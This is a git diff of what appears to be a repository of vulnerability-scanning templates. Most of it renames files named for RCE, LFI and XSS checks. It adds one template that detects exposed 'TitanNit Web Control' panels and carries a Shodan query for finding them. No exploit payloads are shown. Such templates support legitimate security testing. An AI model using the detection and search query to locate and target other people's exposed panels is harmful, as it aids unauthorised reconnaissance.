a/poc/web/git-web-interface-7713.yaml b/poc/web/git-web-interface.yaml similarity index 100% rename from poc/web/git-web-interface-7713.yaml rename to poc/web/git-web-interface.yaml diff --git a/poc/web/ibm-mqseries-web-console.yaml b/poc/web/ibm-mqseries-web-console-8109.yaml similarity index 100% rename from poc/web/ibm-mqseries-web-console.yaml rename to poc/web/ibm-mqseries-web-console-8109.yaml diff --git a/poc/web/icewarp-webclient-rce.yaml b/poc/web/icewarp-webclient-rce-8133.yaml similarity index 100% rename from poc/web/icewarp-webclient-rce.yaml rename to poc/web/icewarp-webclient-rce-8133.yaml diff --git a/poc/web/titannit-web-exposure.yaml b/poc/web/titannit-web-exposure.yaml new file mode 100644 index 0000000000..8820107c4c --- /dev/null +++ b/poc/web/titannit-web-exposure.yaml @@ -0,0 +1,30 @@ +id: titannit-web-exposure + +info: + name: TitanNit Web Control - Exposure + author: DhiyaneshDk + severity: medium + metadata: + verified: true + max-request: 1 + shodan-query: title:"TitanNit Web Control" + tags: misconfig,titannit,webcontrol,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>TitanNit Web Control" + - "System</a>" + condition: and + + - type: status + status: + - 200 +# digest: 4a0a004730450221008000902f0dd80d44d24d0aaa51dc88fb8ca6ea57bdbade552e272b651c9a0e2e02207dbc82cdb7f044cb3ec30f67daee04ba1b293f307cdf6a51b723b7d1720fed34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/web/web-ftp-detect.yaml b/poc/web/web-ftp-detect-11137.yaml similarity index 100% rename from poc/web/web-ftp-detect.yaml rename to poc/web/web-ftp-detect-11137.yaml diff --git a/poc/wordpress/trilithic-viewpoint-login.yaml b/poc/wordpress/trilithic-viewpoint-login-10840.yaml similarity index 100% rename from poc/wordpress/trilithic-viewpoint-login.yaml rename to poc/wordpress/trilithic-viewpoint-login-10840.yaml diff --git a/poc/wordpress/wordpress-lfi(1).yaml b/poc/wordpress/wordpress-LFI.yaml similarity index 100% rename from poc/wordpress/wordpress-lfi(1).yaml rename to poc/wordpress/wordpress-LFI.yaml diff --git a/poc/wordpress/wordpress-wordfence-lfi.yaml b/poc/wordpress/wordpress-wordfence-lfi-11351.yaml similarity index 100% rename from poc/wordpress/wordpress-wordfence-lfi.yaml rename to poc/wordpress/wordpress-wordfence-lfi-11351.yaml diff --git a/poc/wordpress/wp-custom-tables-xss.yaml b/poc/wordpress/wp-custom-tables-xss-11435.yaml similarity index 100% rename from poc/wordpress/wp-custom-tables-xss.yaml rename to poc/wordpress/wp-custom-tables-xss-11435.yaml diff --git a/poc/wordpress/wp-simple-fields-lfi.yaml b/poc/wordpress/wp-simple-fields-lfi-11571.yaml similarity index 100% rename from poc/wordpress/wp-simple-fields-lfi.yaml rename to poc/wordpress/wp-simple-fields-lfi-11571.yaml diff --git a/poc/wordpress/wp-spot-premium-lfi.yaml b/poc/wordpress/wp-spot-premium-lfi-11583.yaml similarity index 100% rename from poc/wordpress/wp-spot-premium-lfi.yaml rename to poc/wordpress/wp-spot-premium-lfi-11583.yaml diff --git a/poc/wordpress/wpdm-cache-session-11439.yaml b/poc/wordpress/wpdm-cache-session.yaml similarity index 100% rename from poc/wordpress/wpdm-cache-session-11439.yaml rename to poc/wordpress/wpdm-cache-session.yaml diff --git a/poc/wordpress/wpmudev-pub-keys.yaml b/poc/wordpress/wpmudev-pub-keys-11507.yaml similarity index 100% rename from poc/wordpress/wpmudev-pub-keys.yaml rename to poc/wordpress/wpmudev-pub-keys-11507.yaml diff --git a/poc/xss/basic-xss-prober-698.yaml b/poc/xss/basic-xss-prober.yaml similarity index 100% rename from poc/xss/basic-xss-prober-698.yaml rename to poc/xss/basic-xss-prober.yaml diff --git a/poc/xss/dom-xss-7078.yaml b/poc/xss/dom-xss.yml similarity index 100% rename from poc/xss/dom-xss-7078.yaml rename to poc/xss/dom-xss.yml diff --git a/poc/xss/mida-eframework-xss-8868.yaml b/poc/xss/mida-eframework-xss.yaml similarity index 100% rename from poc/xss/mida-eframework-xss-8868.yaml rename to poc/xss/mida-eframework-xss.yaml diff --git a/poc/xss/oracle-oam-xss(1).yaml b/poc/xss/oracle-oam-xss.yaml similarity index 100% rename from poc/xss/oracle-oam-xss(1).yaml rename to poc/xss/oracle-oam-xss.yaml diff --git a/poc/xss/turbocrm-xss-10848.yaml b/poc/xss/turbocrm-xss.yaml similarity index 100% rename from poc/xss/turbocrm-xss-10848.yaml rename to poc/xss/turbocrm-xss.yaml diff --git a/poc/xss/window-name-domxss-11212.yaml b/poc/xss/window-name-domxss.yaml similarity index 100% rename from poc/xss/window-name-domxss-11212.yaml rename to poc/xss/window-name-domxss.yaml diff --git a/poc/xss/wp-custom-tables-xss.yaml b/poc/xss/wp-custom-tables-xss-11435.yaml similarity index 100% rename from poc/xss/wp-custom-tables-xss.yaml rename to poc/xss/wp-custom-tables-xss-11435.yaml